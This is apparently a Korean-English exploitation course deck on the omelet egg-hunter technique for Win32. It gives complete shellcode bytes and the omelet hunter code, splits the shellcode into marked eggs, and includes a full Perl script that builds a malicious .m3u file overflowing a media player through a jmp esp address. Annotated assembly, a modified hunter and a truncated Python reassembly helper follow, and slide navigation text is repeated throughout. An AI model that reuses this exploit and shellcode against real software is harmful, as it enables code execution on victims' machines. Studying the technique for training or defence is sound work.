Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
(
Find Marker
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
)
Check length/index
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c
Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
)
reproduces the original shellcode at the bottom of the stack
Omelet-Egg-Hunter Code메모리 검색 Marker 찾기
단편화된 쉘코드 조립최종 쉘코드로 이동 및 실행
How to work Omelet-Egg-Hunter ?Track3. Exploitation
Introduction
Track3-1 Win32
Overwrite RET
Overwrite SEH
Egg-Hunting
ROP( Return Oriented Programming)
Heap Spray
Track3-2 *NIX
Overwrite RET
Ret-to-LibC
Overwrite .dtors
Overwrite GOT
Track3-3 ARM
Overwrite RET
Ret-to-LibC
ROP (Return Oriented Programming)
Fragmented Shellcode 1/3Length(32) Index(01) Marker\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30
Original Shellcode\x89\xe2\xda\xc1\xd9\x72\xf4\x58 \x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54 \x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a \x4f\x4c\x4b\x50\x4f\x42\x38\x4c
Fragmented Shellcode 2/3Length(32) Index(02) Marker\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x30\x41\x33\x48\x48\x30\x41\x30Fragmented Shellcode 3/3Length(32) Index(03) Marker\x4a\x4a\x49\x4b\x4c\x4a\x48\x50 \x44\x43\x30\x43\x30\x45\x50\x4c \x4b\x47\x35\x47\x4c\x4c\x4b\x43 \x4c\x43\x35\x43\x48\x45\x51\x4a\x30\x41\x42\x41\x41\x42\x54\x41
🔟
jumps to the reproduced shellcode and executes it
How to make the Omelet-Egg-Hunter?
Download the omelet code package (scripts for fragmenting the shellcode and generating the omelet code):
W32-seh-omelet-shellcode (by Skylined) https://code.google.com/p/w32-seh-omelet-shellcode/downloads/list
Creating the shellcode file (makingShellCodeForOmelet.pl): the script writes the raw shellcode bytes to shellcode.bin, which w32_SEH_omelet.py then splits into eggs.

    #!/usr/bin/perl
    use strict;
    use warnings;

    my $scfile = "shellcode.bin";
    my $shellcode =
        "\x89\xe2\xda\xc1\xd9\x72\xf4\x58\x50\x59\x49\x49\x49\x49" .
        "\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56" .
        "\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41" .
        "\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42" .
        "\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4b\x4c\x4a" .
        "\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4c\x4b\x47\x35\x47" .
        "\x4c\x4c\x4b\x43\x4c\x43\x35\x43\x48\x45\x51\x4a\x4f\x4c" .
        "\x4b\x50\x4f\x42\x38\x4c\x4b\x51\x4f\x47\x50\x43\x31\x4a" .
        "\x4b\x51\x59\x4c\x4b\x46\x54\x4c\x4b\x43\x31\x4a\x4e\x50" .
        "\x31\x49\x50\x4c\x59\x4e\x4c\x4c\x44\x49\x50\x43\x44\x43" .
        "\x37\x49\x51\x49\x5a\x44\x4d\x43\x31\x49\x52\x4a\x4b\x4a" .
        "\x54\x47\x4b\x51\x44\x46\x44\x43\x34\x42\x55\x4b\x55\x4c" .
        "\x4b\x51\x4f\x51\x34\x45\x51\x4a\x4b\x42\x46\x4c\x4b\x44" .
        "\x4c\x50\x4b\x4c\x4b\x51\x4f\x45\x4c\x45\x51\x4a\x4b\x4c" .
        "\x4b\x45\x4c\x4c\x4b\x45\x51\x4a\x4b\x4d\x59\x51\x4c\x47" .
        "\x54\x43\x34\x48\x43\x51\x4f\x46\x51\x4b\x46\x43\x50\x50" .
        "\x56\x45\x34\x4c\x4b\x47\x36\x50\x30\x4c\x4b\x51\x50\x44" .
        "\x4c\x4c\x4b\x44\x30\x45\x4c\x4e\x4d\x4c\x4b\x45\x38\x43" .
        "\x38\x4b\x39\x4a\x58\x4c\x43\x49\x50\x42\x4a\x50\x50\x42" .
        "\x48\x4c\x30\x4d\x5a\x43\x34\x51\x4f\x45\x38\x4a\x38\x4b" .
        "\x4e\x4d\x5a\x44\x4e\x46\x37\x4b\x4f\x4d\x37\x42\x43\x45" .
        "\x31\x42\x4c\x42\x43\x45\x50\x41\x41";

    open(my $FILE, '>', $scfile) or die "Cannot open $scfile: $!";
    binmode($FILE);    # raw bytes: no newline translation on Windows
    print $FILE $shellcode;
    close($FILE);
    print "Wrote " . length($shellcode) . " bytes to file " . $scfile . "\n";
Convert the shellcode into eggs
The maximum amount of shellcode one egg can hold is 127 bytes; Marker = 0xBADA55

Running the tool without arguments prints its usage:

    C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py
    Syntax: w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes]
    Where:
      omelet bin file    = The omelet shellcode stage binary code followed by three bytes of the offsets of the "marker bytes", "max index" and "egg size" variables in the code.
      shellcode bin file = The shellcode binary code you want to have stored in the eggs and reconstructed by the omelet shellcode stage code.
      output txt file    = The file you want the omelet egg-hunt code and the eggs to be written to (in text format).
      egg size           = The size of each egg (legal values: 6-127, default: 127)
      marker bytes       = The value you want to use as a marker to distinguish the eggs from other data in user-land address space (legal values: 0-0xFFFFFF, default value: 0x280876)

Converting shellcode.bin with an egg size of 127 and the marker 0xBADA55:

    C:\Documents and Settings\edu\Desktop\examples\Track3\3EggHunting\ToolsForEggHunting\w32 SEH omelet shellcode v0>w32_SEH_omelet.py w32_SEH_omelet.bin shellcode.bin calceggs.txt 127 0xBADA55
Contents of calceggs.txt as written by the tool (omelet_code, egg0, egg1, egg2):

    // This is the binary code that needs to be executed to find the eggs,
    // recombine the orignal shellcode and execute it. It is 82 bytes:
    omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x03\x97\xEB\xDB\x31\xC0\x64\xFF\x50\x08";
    // These are the eggs that need to be injected into the target process
    // for the omelet shellcode to be able to recreate the original shellcode
    // (you can insert them as many times as you want, as long as each one is
    // inserted at least once). They are 127 bytes each:
    egg0 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
    egg1 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
    egg2 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";
Exploit script that places the omelet code and the three eggs in the .m3u file:

    #!/usr/bin/perl
    use strict;
    use warnings;

    my $file = "OmeletEggHuntingExploit1.m3u";
    my $junk = "A" x 26039;
    my $eip = pack('V', 0x7608fcfe);   # jmp esp from MSRMCcodec02.dll (jump to shell code)
    my $padding = "\x90" x 25;         # nop sled
    my $garbage = "This is a bunch of garbage" x 10;

    # omelet code for finding eggs
    my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2" .
        "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59" .
        "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08" .
        "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF" .
        "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8" .
        "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

    # each egg: [size 0x7A][index ^ 0xFF][marker 0xBADA55, little-endian] + shellcode fragment
    my $egg1 = "\x7A\xFF\x55\xDA\xBA\x89\xE2\xDA\xC1\xD9\x72\xF4\x58\x50" .
        "\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5A\x56\x54\x58\x33" .
        "\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42" .
        "\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58" .
        "\x50\x38\x41\x43\x4A\x4A\x49\x4B\x4C\x4A\x48\x50\x44\x43\x30\x43\x30" .
        "\x45\x50\x4C\x4B\x47\x35\x47\x4C\x4C\x4B\x43\x4C\x43\x35\x43\x48\x45" .
        "\x51\x4A\x4F\x4C\x4B\x50\x4F\x42\x38\x4C\x4B\x51\x4F\x47\x50\x43\x31" .
        "\x4A\x4B\x51\x59\x4C\x4B\x46\x54\x4C\x4B\x43";
    my $egg2 = "\x7A\xFE\x55\xDA\xBA\x31\x4A\x4E\x50\x31\x49\x50\x4C\x59" .
        "\x4E\x4C\x4C\x44\x49\x50\x43\x44\x43\x37\x49\x51\x49\x5A\x44\x4D\x43" .
        "\x31\x49\x52\x4A\x4B\x4A\x54\x47\x4B\x51\x44\x46\x44\x43\x34\x42\x55" .
        "\x4B\x55\x4C\x4B\x51\x4F\x51\x34\x45\x51\x4A\x4B\x42\x46\x4C\x4B\x44" .
        "\x4C\x50\x4B\x4C\x4B\x51\x4F\x45\x4C\x45\x51\x4A\x4B\x4C\x4B\x45\x4C" .
        "\x4C\x4B\x45\x51\x4A\x4B\x4D\x59\x51\x4C\x47\x54\x43\x34\x48\x43\x51" .
        "\x4F\x46\x51\x4B\x46\x43\x50\x50\x56\x45\x34\x4C\x4B\x47\x36\x50\x30" .
        "\x4C\x4B\x51\x50\x44\x4C\x4C\x4B\x44\x30\x45";
    my $egg3 = "\x7A\xFD\x55\xDA\xBA\x4C\x4E\x4D\x4C\x4B\x45\x38\x43\x38" .
        "\x4B\x39\x4A\x58\x4C\x43\x49\x50\x42\x4A\x50\x50\x42\x48\x4C\x30\x4D" .
        "\x5A\x43\x34\x51\x4F\x45\x38\x4A\x38\x4B\x4E\x4D\x5A\x44\x4E\x46\x37" .
        "\x4B\x4F\x4D\x37\x42\x43\x45\x31\x42\x4C\x42\x43\x45\x50\x41\x41\x40" .
        "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" .
        "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" .
        "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40" .
        "\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40\x40";

    open(my $FILE, '>', $file) or die "Cannot open $file: $!";
    print $FILE $junk . $eip . $padding . $omelet_code . $garbage . $egg1 . $garbage . $egg2 . $garbage . $egg3;
    close($FILE);
    print "m3u File Created successfully\n";
An access violation occurs (Access violation when reading [00000000]).
w32_SEH_omelet.asm / shellcode analysis
In the exploit script above, $eip (jmp esp) jumps to the shell code, $padding is the nop sled, and $omelet_code is the omelet code for finding eggs; the rest of the script is omitted here.
EDI → 0x00000000: the scan starts at address 0, so the first read faults; the handler installed by the code catches the Access Violation and moves on to the next page.

    start:
        XOR EDI, EDI                    ; EDI = 0x00000000, scanning starts here
        jmp SHORT reset_stack

    create_SEH_handler:
        PUSH ECX                        ; SEH_frames[0].nextframe == 0xFFFFFFFF
        MOV [FS:EAX], ESP               ; SEH_chain -> SEH_frames[0]
        CLD                             ; SCAN memory upwards from 0
    scan_loop:
        MOV AL, egg_size                ; EAX = egg_size
    egg_size_location equ $-1 - $$
        REPNE SCASB                     ; Find the first byte (an unmapped page here raises an Access Violation -> SEH_handler)
        PUSH EAX                        ; Save egg_size
        MOV ESI, EDI
        LODSD                           ; EAX = II M2 M3 M4
        XOR EAX, (marker << 8) + 0xFF   ; EAX = (II M2 M3 M4) ^ (FF M2 M3 M4) == egg_index
    marker_bytes_location equ $-3 - $$
        CMP EAX, BYTE max_index         ; Check if the value of EAX is < max_index
    max_index_location equ $-1 - $$
        JA reset_stack                  ; No -> This was not a marker, continue scanning
        POP ECX                         ; ECX = egg_size
        IMUL ECX                        ; EAX = egg_size * egg_index == egg_offset
                                        ; EDX = 0 because ECX * EAX is always less than 0x1,000,000
        ADD EAX, [BYTE FS:EDX + 8]      ; EAX += Bottom of stack == position of egg in shellcode.
        XCHG EAX, EDI
    copy_loop:
        REP MOVSB                       ; copy egg to basket
        MOV EDI, ESI                    ; EDI = end of egg

    reset_stack:
        ; Reset the stack to prevent problems caused by recursive SEH handlers and set
        ; ourselves up to handle any AVs we may cause by scanning memory:
        XOR EAX, EAX                    ; EAX = 0
        MOV ECX, [FS:EAX]               ; ECX = SEH_chain => SEH_frames[X]
    find_last_SEH_loop:
        MOV ESP, ECX                    ; ESP = SEH_frames[X]
        POP ECX                         ; ECX = SEH_frames[X].next_frame
        CMP ECX, 0xFFFFFFFF             ; SEH_frames[X].next_frame == none ?
        JNE find_last_SEH_loop          ; No "X -= 1", check next frame
        POP EDX                         ; EDX = SEH_frames[0].handler
        CALL create_SEH_handler         ; SEH_frames[0].handler == SEH_handler

    SEH_handler:
        POPA                            ; ESI = [ESP + 4] -> struct exception_info
        LEA ESP, [BYTE ESI+0x18]        ; ESP = struct exception_info->exception_address
        POP EAX                         ; EAX = exception address 0x????????
        OR AX, 0xFFF                    ; EAX = 0x?????FFF
        INC EAX                         ; EAX = 0x?????FFF + 1 -> next page
        JS done                         ; EAX > 0x7FFFFFFF ===> done
        XCHG EAX, EDI                   ; EDI => next page
        JMP reset_stack
    done:
        XOR EAX, EAX                    ; EAX = 0
        CALL [BYTE FS:EAX + 8]          ; Call the reconstructed shellcode at the bottom of the stack.

Access Violation: with EDI = 0x00000000 the first REPNE SCASB faults, SEH_handler advances EDI to the next page, and scanning resumes from there.
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg1.bin"
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg2.bin"
!mona compare "C:\\Documents and Settings\\edu\\Desktop\\examples\\Track3\\3EggHunting\\ToolsForEggHunting\\w32 SEH omelet shellcode v0\\egg3.bin"
mona compare results: egg1, egg2 and egg3 were each found in memory at 0x000FDxxx
How to make the Omelet Egg-Hunter?
w32_SEH_omelet.asm / modified shell code 1

# original omelet code: begins with XOR EDI, EDI (\x31\xFF), so the scan starts at address 0
my $omelet_code = "\x31\xFF\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2".
                  "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59".
                  "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08".
                  "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF".
                  "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8".
                  "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";

# modified: load the start address into EDI first (MOV DI, 0x1F80 followed by seven SHL EDI, 1,
# so EDI = 0x1F80 << 7 = 0x000FC000, just below the eggs found at 0x000FDxxx) ...
my $shlEDI = "\x66\xBF\x80\x1F\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7\xD1\xE7".
             "\xD1\xE7\xD1\xE7"; #0x1F80 shift x 7
# ... and replace XOR EDI, EDI with two NOPs (\x90\x90) so the omelet code keeps that value
my $omelet_code = "\x90\x90\xEB\x23\x51\x64\x89\x20\xFC\xB0\x7A\xF2".
                  "\xAE\x50\x89\xFE\xAD\x35\xFF\x55\xDA\xBA\x83\xF8\x03\x77\x0C\x59".
                  "\xF7\xE9\x64\x03\x42\x08\x97\xF3\xA4\x89\xF7\x31\xC0\x64\x8B\x08".
                  "\x89\xCC\x59\x81\xF9\xFF\xFF\xFF\xFF\x75\xF5\x5A\xE8\xC7\xFF\xFF".
                  "\xFF\x61\x8D\x66\x18\x58\x66\x0D\xFF\x0F\x40\x78\x06\x97\xE9\xD8".
                  "\xFF\xFF\xFF\x31\xC0\x64\xFF\x50\x08";
custom_w32_SEH_omelet.asm (excerpt: the parts changed from w32_SEH_omelet.asm)

marker    equ 0x280876
egg_size  equ 0x3
max_index equ 0x2
start:
  mov ebx, 0xffffffff-egg_size+1    ; EBX = -egg_size: counts copied eggs, done after egg_size of them
  jmp SHORT reset_stack
...
copy_loop:
  REP MOVSB                         ; copy egg to basket
  CMP EBX, 0xFFFFFFFF               ; all eggs copied?
  JE done
  INC EBX
  MOV EDI, ESI                      ; EDI = end of egg
...
done:
  XOR EAX, EAX                      ; EAX = 0
  CALL [BYTE FS:EAX + 8]            ; jump to the bottom of the stack, where the eggs were reassembled
custom_w32_SEH_omelet.asm

BITS 32
; egg:
; LL II M1 M2 M3 DD DD DD ... (LL * DD)
; LL == Size of eggs (same for all eggs)
; II == Index of egg (different for each egg)
; M1,M2,M3 == Marker byte (same for all eggs)
; DD == Data in egg (different for each egg)
marker    equ 0x280876
egg_size  equ 0x3
max_index equ 0x2
start:
  mov ebx, 0xffffffff-egg_size+1    ; EBX = -egg_size: counts copied eggs, done after egg_size of them
  jmp SHORT reset_stack
create_SEH_handler:
  PUSH ECX                          ; SEH_frames[0].nextframe == 0xFFFFFFFF
  MOV [FS:EAX], ESP                 ; SEH_chain -> SEH_frames[0]
  CLD                               ; SCAN memory upwards from 0
scan_loop:
  MOV AL, egg_size                  ; EAX = egg_size
  egg_size_location equ $-1 - $$
  REPNE SCASB                       ; Find the first byte (LL)
  PUSH EAX                          ; Save egg_size
  MOV ESI, EDI
  LODSD                             ; EAX = II M1 M2 M3
  XOR EAX, (marker << 8) + 0xFF     ; EAX = (II M1 M2 M3) ^ (FF M1 M2 M3) == egg_index
  marker_bytes_location equ $-3 - $$
  CMP EAX, BYTE max_index           ; Check if EAX (egg_index) is <= max_index
  max_index_location equ $-1 - $$
  JA reset_stack                    ; No -> This was not a marker, continue scanning
  POP ECX                           ; ECX = egg_size
  IMUL ECX                          ; EAX = egg_size * egg_index == egg_offset
                                    ; EDX = 0 because ECX * EAX is always less than 0x1,000,000
  ADD EAX, [BYTE FS:EDX + 8]        ; EAX += Bottom of stack == position of egg in shellcode
  XCHG EAX, EDI
copy_loop:
  REP MOVSB                         ; copy egg to basket
  CMP EBX, 0xFFFFFFFF               ; all eggs copied?
  JE done
  INC EBX
  MOV EDI, ESI                      ; EDI = end of egg
reset_stack:
  ; Reset the stack to prevent problems caused by recursive SEH handlers and set
  ; ourselves up to handle any AVs we may cause by scanning memory:
  XOR EAX, EAX                      ; EAX = 0
  MOV ECX, [FS:EAX]                 ; ECX = SEH_chain => SEH_frames[X]
find_last_SEH_loop:
  MOV ESP, ECX                      ; ESP = SEH_frames[X]
  POP ECX                           ; ECX = SEH_frames[X].next_frame
  CMP ECX, 0xFFFFFFFF               ; SEH_frames[X].next_frame == none ?
  JNE find_last_SEH_loop            ; No "X -= 1", check next frame
  POP EDX                           ; EDX = SEH_frames[0].handler
  CALL create_SEH_handler           ; SEH_frames[0].handler == SEH_handler
SEH_handler:
  POPA                              ; ESI = [ESP + 4] -> struct exception_info
  LEA ESP, [BYTE ESI+0x18]          ; ESP = struct exception_info->exception_address
  POP EAX                           ; EAX = exception address 0x????????
  OR AX, 0xFFF                      ; EAX = 0x?????FFF
  INC EAX                           ; EAX = 0x?????FFF + 1 -> next page
  JS done                           ; EAX > 0x7FFFFFFF ===> done
  XCHG EAX, EDI                     ; EDI => next page
  JMP reset_stack
done:
  XOR EAX, EAX                      ; EAX = 0
  CALL [BYTE FS:EAX + 8]            ; jump to the bottom of the stack, where the eggs were reassembled
db marker_bytes_location
db max_index_location
db egg_size_location
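The egg layout from the comment block and the checks the hunter performs (SCASB for LL, LODSD and XOR against (marker << 8) + 0xFF, CMP against max_index, IMUL for the basket offset), as an added Python example that is neither the deck's code nor SkyLined's w32_SEH_omelet.py. It packs a constructed payload into eggs with the values used in the deck's run (marker 0xBADA55, 127-byte eggs, hence LL = 0x7A) and reassembles them from a constructed memory image; the same scan lets an analyst carve the original payload back out of scattered eggs in a memory dump, and, like the custom hunter above, it stops once every egg has been copied.

```python
import struct

# Values from the deck's run: marker 0xBADA55 and a 127-byte maximum egg, i.e. a
# 5-byte header LL II M1 M2 M3 followed by LL = 122 = 0x7A data bytes.
MARKER = 0xBADA55
HEADER_LEN = 5

def make_eggs(payload, max_egg_size=127, marker=MARKER):
    """Split payload into eggs laid out as LL II M1 M2 M3 DD..DD (LL data bytes).
    II is stored as index ^ 0xFF, so the hunter's XOR with (marker << 8) | 0xFF
    yields the plain index; the last egg is padded with 0x40 like the deck's egg3."""
    ll = max_egg_size - HEADER_LEN
    if not 1 <= ll <= 0xFF or marker > 0xFFFFFF:
        raise ValueError("LL must fit in one byte and the marker in three")
    eggs = []
    for index, start in enumerate(range(0, len(payload), ll)):
        data = payload[start:start + ll].ljust(ll, b"\x40")
        # M1 M2 M3 are the marker's bytes in little-endian order (55 DA BA for 0xBADA55)
        eggs.append(bytes([ll, index ^ 0xFF]) + struct.pack("<I", marker)[:3] + data)
    return eggs

def hunt(memory, egg_size, max_index, marker=MARKER):
    """Reassemble eggs from a memory image with the hunter's own checks: a byte equal
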